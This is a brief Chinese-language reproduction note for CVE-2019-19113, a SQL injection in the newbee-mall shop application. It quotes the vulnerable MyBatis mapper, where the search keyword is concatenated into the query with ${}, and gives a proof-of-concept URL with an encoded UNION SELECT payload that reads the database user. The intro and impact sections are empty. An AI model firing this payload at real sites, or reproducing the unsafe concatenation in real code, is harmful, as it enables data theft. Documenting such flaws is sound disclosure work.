(CVE-2019-19113)新蜂商城sql注入
一、漏洞简介
二、漏洞影响
三、复现过程
\src\main\resources\mapper\NewBeeMallGoodsMapper.xml
<select id="findNewBeeMallGoodsListBySearch" parameterType="Map" resultMap="BaseResultMap">
select
<include refid="Base_Column_List"/>
from tb_newbee_mall_goods_info
<where>
<if test="keyword!=null and keyword!=''">
and (goods_name like CONCAT('%','${keyword}','%') or goods_intro like CONCAT('%','${keyword}','%'))
</if>
<if test="goodsCategoryId!=null and goodsCategoryId!=''">
and goods_category_id = #{goodsCategoryId}
</if>
</where>
<if test="orderBy!=null and orderBy!=''">
<choose>
<when test="orderBy == 'new'">
<!-- 按照发布时间倒序排列 -->
order by goods_id desc
</when>
<when test="orderBy == 'price'">
<!-- 按照售价从小到大排列 -->
order by selling_price asc
</when>
<otherwise>
<!-- 默认按照库存数量从大到小排列 -->
order by stock_num desc
</otherwise>
</choose>
</if>
<if test="start!=null and limit!=null">
limit #{start},#{limit}
</if>
</select>
如果使用\$ {keyword}拼接sql语句,则存在SQL注入的风险
poc:
http://0-sec.org:28089/search?goodsCategoryId=&keyword=%5C%25%27%29%29%20%55%4E%49%4F%4E%20%41%4C%4C%20%53%45%4C%45%43%54%20%4E%55%4C%4C%2C%4E%55%4C%4C%2C%4E%55%4C%4C%2C%4E%55%4C%4C%2C%4E%55%4C%4C%2C%4E%55%4C%4C%2C%4E%55%4C%4C%2C%4E%55%4C%4C%2C%4E%55%4C%4C%2C%4E%55%4C%4C%2C%4E%55%4C%4C%2C%4E%55%4C%4C%2C%43%4F%4E%43%41%54%28%30%78%37%31%37%36%36%32%37%38%37%31%2C%49%46%4E%55%4C%4C%28%43%41%53%54%28%43%55%52%52%45%4E%54%5F%55%53%45%52%28%29%20%41%53%20%43%48%41%52%29%2C%30%78%32%30%29%2C%30%78%37%31%36%32%37%38%36%62%37%31%29%2C%4E%55%4C%4C%2C%4E%55%4C%4C%23&orderBy=defaul